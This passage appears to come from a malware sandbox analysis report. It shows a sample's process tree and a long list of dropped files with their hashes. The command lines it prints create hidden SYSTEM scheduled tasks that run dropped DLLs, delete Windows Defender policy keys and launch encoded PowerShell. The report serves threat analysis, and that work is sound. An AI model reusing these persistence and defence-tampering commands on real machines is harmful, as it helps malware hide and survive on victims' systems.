                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  schtasks /DELETE /F /TN "gJMBcvCaW"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4320
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 17:59:15 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\wXyVQwS.exe\" KS /vMsite_iduTf 385118 /S" /V1 /F
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:2612
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:4616
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:4860
                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:2848
                                                                                                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:2296
                                                                                                                                                                                        • C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\wXyVQwS.exe
                                                                                                                                                                                          C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\wXyVQwS.exe KS /vMsite_iduTf 385118 /S
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Drops Chrome extension
                                                                                                                                                                                          • Drops desktop.ini file(s)
                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                          PID:2372
                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                            schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:3192
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4240
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:4980
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:1212
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4020
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\kunRDm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:4312
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "ztlTbPYifermRZH2" /F /xml "C:\Program Files (x86)\oVhJPNkDU\exZibaI.xml" /RU "SYSTEM"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:3892
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /END /TN "ztlTbPYifermRZH"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:3720
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /DELETE /F /TN "ztlTbPYifermRZH"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:4436
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "lYRFoiYPtWPCfC" /F /xml "C:\Program Files (x86)\DlbZONUGhjVU2\NnXXDql.xml" /RU "SYSTEM"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:3492
                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:4288
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "TrprvximDXTQo2" /F /xml "C:\ProgramData\nBRnpywzcTvqknVB\ufiowBU.xml" /RU "SYSTEM"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:3144
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "NtSpqNxSmBAhIMqiB2" /F /xml "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\XdocruQ.xml" /RU "SYSTEM"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:3504
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "gFXJCgZLnIrdqQxYYQs2" /F /xml "C:\Program Files (x86)\KrPQunXfXpAVC\jNcfuKN.xml" /RU "SYSTEM"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:3640
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "HKFMMLmWpeGdwIqGl" /SC once /ST 06:12:44 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\OIkNSqKA\fLkiqZd.dll\",#1 /Vssite_idnBE 385118" /V1 /F
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:1836
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /run /I /tn "HKFMMLmWpeGdwIqGl"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:412
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:2792
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:3704
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Windows security bypass
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Windows security modification
                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                  • Checks for VirtualBox DLLs, possible anti-VM trick
                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  PID:4328
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:4640
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /DELETE /F /TN "GyWbuVQzPmDmgkCMH"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:4544
                                                                                                                                                                                                                  • \??\c:\windows\system32\rundll32.EXE
                                                                                                                                                                                                                    c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\OIkNSqKA\fLkiqZd.dll",#1 /Vssite_idnBE 385118
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:1028
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                      c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\OIkNSqKA\fLkiqZd.dll",#1 /Vssite_idnBE 385118
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:1048
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /DELETE /F /TN "HKFMMLmWpeGdwIqGl"
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:4000
                                                                                                                                                                                                                      • C:\Windows\windefender.exe
                                                                                                                                                                                                                        C:\Windows\windefender.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                        PID:520
                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:3572
                                                                                                                                                                                                                        • \??\c:\windows\system32\gpscript.exe
                                                                                                                                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:3792

                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\updater.exe

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            5.2MB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            df280925e135481b26e921dd1221e359

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            877737c142fdcc03c33e20d4f17c48a741373c9e

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            710a3e1beda67e1c543ba04423bfb0ba643815582310c0b3d03d03e071c894b8

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            3da682a655a9df0ad0fcc6f28953f104383f3abe695afdd7a236d9ea0f05ef4de210da7c46139f3ce01e3e7dde9abf02b3665d1289e20426ba9164468807f487

                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\updater.exe

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            5.2MB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            df280925e135481b26e921dd1221e359

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            877737c142fdcc03c33e20d4f17c48a741373c9e

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            710a3e1beda67e1c543ba04423bfb0ba643815582310c0b3d03d03e071c894b8

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            3da682a655a9df0ad0fcc6f28953f104383f3abe695afdd7a236d9ea0f05ef4de210da7c46139f3ce01e3e7dde9abf02b3665d1289e20426ba9164468807f487

                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\updater.exe

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            5.2MB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            df280925e135481b26e921dd1221e359

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            877737c142fdcc03c33e20d4f17c48a741373c9e

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            710a3e1beda67e1c543ba04423bfb0ba643815582310c0b3d03d03e071c894b8

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            3da682a655a9df0ad0fcc6f28953f104383f3abe695afdd7a236d9ea0f05ef4de210da7c46139f3ce01e3e7dde9abf02b3665d1289e20426ba9164468807f487

                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.2MB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            2630b80d764250a9ef860472c2f3542b

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            5172e7a2354b921ed17f7f44ff9bebfc6db97316

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            c32d6fe5e1feacb46b5f25d25759d1011edb6c4c81d57d593d3af4fd8cda71a4

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            269cd53864a46cbc9c50588f0a425f5c52e786f8de07ea9d8696287e84cdcf9c61ba9a516a865a0c04034e430a07a4a51d75e88230ed8f9501278776af3fec24

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            187B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            136B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            150B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            10KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            1465529ccdddb3836c10cf839386395b

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            c8fdae4cc011243b292711c695cf6bad5c6a90fe

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            c701b450ea8d6fde52de497b1348d111ee0498e70516db3edab012319e30de1b

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            5c618eb5ae131ef0041973b7e7422578501174211d7ec5d0670201c344189328a769d147208d55c7c0b0a25268263f82a0c0bb0428bc3398539f7f7764515d3f

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            27KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            1731d4ac08227a982172ddbade591905

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            bf6ececb97722cfc94192d7907ce976f51c9f877

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            1c1ce117d2168458595a89d10901ccd7f3b3383d5bab9e9a9875b783886eb650

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            866e003b84ad51ac61d41fd374b28259b8ef08dd1643833d05cc8fe8d1ac53699a31be741dc90d27cb25d26440efe34cc305cb92412a30c1a99e34ae0d8ee352

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            3KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            ad5cd538ca58cb28ede39c108acb5785

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            1ae910026f3dbe90ed025e9e96ead2b5399be877

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            2KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            db01a2c1c7e70b2b038edf8ad5ad9826

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            540217c647a73bad8d8a79e3a0f3998b5abd199b

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            19KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            a5ea84c923abfee2962b8597a654fca6

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            c482bc7d5ce5ebc83a32e27cd546fba6b0fa76a9

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            6cd0ee59b53f69fd8e131abd1e217f1272736a3b349d6669f8caad823ede8162

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            4782e3cb2814f11401085c5e6c9f961972ae0d6ab06a969593050034f351a50df898eb112149e8fa88545eb6e389a6b1e266951f22f6936fa7005da7775cde89

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            1f5029c2ea2ccf7939855315f3f43b3f

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            b49e0b60a493dd2e613d02a2a3042374916ac416

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            3e5f32e1b8305d696518cbdf5cac46aa928444acd2613ecb0c9d302931af37d0

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            52188c2a6cf6b08ed61f4a25fbac7fa48be58ca012f110f443b41c6200a9da53f9867cccaf2cb539f159f4e6dae64dd5a5242610025f7a26eeb163cba443ad78

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\additional_file0.tmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.9MB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            b0f128c3579e6921cfff620179fb9864

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            60e19c987a96182206994ffd509d2849fdb427e3

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.9MB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            b0f128c3579e6921cfff620179fb9864

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            60e19c987a96182206994ffd509d2849fdb427e3

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.9MB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            b0f128c3579e6921cfff620179fb9864

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            60e19c987a96182206994ffd509d2849fdb427e3

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\assistant_installer.exe

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            2.1MB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            34afbc4605531efdbe6f6ce57f567c0a

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            6cb65f3565e40e7d08f5a0ad37b1b9182b4fc81b

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            0441668bc7daf97c16734a8a95eb29de9fd2f4bec368f4d009e5437862249019

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            577fe412d9b20055cf2f67e029a6829301d6b010cc03d2cf8ce89b87c213530dc4d396a27b92f56ed8260afd59d6fbd8cf841e807460f0a0bad4ad1df5b7c25c

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\assistant_installer.exe

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            2.1MB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            34afbc4605531efdbe6f6ce57f567c0a

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            6cb65f3565e40e7d08f5a0ad37b1b9182b4fc81b

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            0441668bc7daf97c16734a8a95eb29de9fd2f4bec368f4d009e5437862249019

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            577fe412d9b20055cf2f67e029a6829301d6b010cc03d2cf8ce89b87c213530dc4d396a27b92f56ed8260afd59d6fbd8cf841e807460f0a0bad4ad1df5b7c25c

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\dbgcore.DLL

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            166KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            5a6cd2117967ec78e7195b6ee10fc4da

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            72d929eeb50dd58861a1d4cf13902c0b89fadc34

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            07aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\dbghelp.dll

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.7MB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            861a07bcf2a5cb0dda1aaf6dfcb57b26

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            a0bdbbc398583a7cfdd88624c9ac2da1764e0826

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            7878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\opera_package

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            94.4MB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            0ba90769769f38c565fe368421b3b75f

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            09227068b5ddcc0ecff7dd0275569b3849770292

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            a981817ba6addd18fba84aee8418aabd9fd39c9812edbdf2c5a391fb7fb8e491

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            1d9ed4b1a02f4c70acd0f617eec3401a684b86e65fe7e9ea99ac2b83d3637eea6f93646fe671c0f5c9acf6b7d54ae8f9b12d23b7ad5d37981d3dd1804f1d8302

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\zhqw0x5VEifunzipVxSGz3iI.exe

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            2.8MB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            9ab64a2166ebd3a9a33105fd8a9d5a1f

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            914523271399ac6e00d57bfd139d6ffd2d46acfb

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            1c4348925bb25c3af634312c62a7a1ce9018ddf248ddeabbd542a2fb8e4f40cc

                                                                                                                                                                                                                            SHA512

